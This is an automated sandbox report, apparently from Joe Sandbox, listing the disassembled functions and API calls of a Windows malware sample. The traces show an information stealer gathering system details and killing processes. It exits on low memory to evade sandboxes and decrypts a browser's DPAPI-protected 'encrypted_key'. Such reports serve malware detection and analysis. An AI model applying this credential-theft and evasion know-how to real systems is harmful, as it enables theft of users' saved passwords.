Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02D1E098,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
CloseHandle.KERNEL32(00000000), ref: 00416D99
Sleep.KERNEL32(00001770), ref: 00416DA4
CloseHandle.KERNEL32(?,00000000,?,02D1E098,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
ExitProcess.KERNEL32 ref: 00416DC2

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: ada8cc1a58fc6a9ef443474515c08dffa7d744f0302f133aad3320b04f4b6a9d
Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
Opcode Fuzzy Hash: ada8cc1a58fc6a9ef443474515c08dffa7d744f0302f133aad3320b04f4b6a9d
Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E

Function 0041856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
wsprintfA.USER32 ref: 004185E9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
RegCloseKey.ADVAPI32(00000000), ref: 0041861C
RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

RegQueryValueExA.KERNEL32(00000000,02D25790,00000000,000F003F,?,00000400), ref: 0041867C
lstrlenA.KERNEL32(?), ref: 00418691
RegQueryValueExA.KERNEL32(00000000,02D257A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
RegCloseKey.ADVAPI32(00000000), ref: 00418798
RegCloseKey.ADVAPI32(00000000), ref: 004187AA

Strings

%s\%s, xrefs: 004185DD

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: eb9fe55a0c0fd479fcb2d4698caedf718c5f75609201eeaaa4f2183de76d1f8d
Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
Opcode Fuzzy Hash: eb9fe55a0c0fd479fcb2d4698caedf718c5f75609201eeaaa4f2183de76d1f8d
Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98

Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Strings

<, xrefs: 00404819

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: b97750cbae1d96d90304f6b055492f547bf458627f2d7bb390df384fcfc69ba1
Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
Opcode Fuzzy Hash: b97750cbae1d96d90304f6b055492f547bf458627f2d7bb390df384fcfc69ba1
Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95

Function 004199A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
CloseHandle.KERNEL32(00000000), ref: 00419A79
CloseHandle.KERNEL32(0040A056), ref: 00419A88

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51

Function 00417820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
HeapAlloc.KERNEL32(00000000), ref: 0041783B
RegOpenKeyExA.KERNEL32(80000002,02D214D8,00000000,00020119,00000000), ref: 0041786D
RegQueryValueExA.KERNEL32(00000000,02D25610,00000000,00000000,?,000000FF), ref: 0041788E
RegCloseKey.ADVAPI32(00000000), ref: 00417898

Strings

Windows 11, xrefs: 0041784D

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55

Function 004178B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
HeapAlloc.KERNEL32(00000000), ref: 004178CB
RegOpenKeyExA.KERNEL32(80000002,02D214D8,00000000,00020119,00417849), ref: 004178EB
RegQueryValueExA.KERNEL32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
RegCloseKey.ADVAPI32(00417849), ref: 00417914

Strings

CurrentBuildNumber, xrefs: 00417901

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91

Function 004137B0 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004137D8

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

strtok_s.MSVCRT ref: 00413921

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D1E098,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 7759dd33cc3bdeb04827351dfb133ee2820de92c7dcc0642741f76f2dd21cc53
Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
Opcode Fuzzy Hash: 7759dd33cc3bdeb04827351dfb133ee2820de92c7dcc0642741f76f2dd21cc53
Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA

Function 0040A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
LocalFree.KERNEL32(00410447), ref: 0040A1E0
CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 6c3d9035560afeffe67b48671e93309fa07cca364ba822679ac6748d1d2d7174
Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
Opcode Fuzzy Hash: 6c3d9035560afeffe67b48671e93309fa07cca364ba822679ac6748d1d2d7174
Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6

Function 00415190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
lstrcatA.KERNEL32(?,00421058), ref: 004151E7
lstrcatA.KERNEL32(?,02D1E0E8), ref: 004151FB
lstrcatA.KERNEL32(?,0042105C), ref: 0041520D

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

Strings

cA, xrefs: 00415235, 0041526A, 0041528F, 00415238, 0041526D

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: cA
API String ID: 2667927680-2872761854
Opcode ID: fc94bdad63df90f257ef5a9da4b9ef557d0f45b3424462f0ebe2a1fd7388a457
Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
Opcode Fuzzy Hash: fc94bdad63df90f257ef5a9da4b9ef557d0f45b3424462f0ebe2a1fd7388a457
Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D

Function 0040A430 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489

Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2

Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323

Strings

"encrypted_key":", xrefs: 0040A480
, xrefs: 0040A511
DPAPI, xrefs: 0040A4D9

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
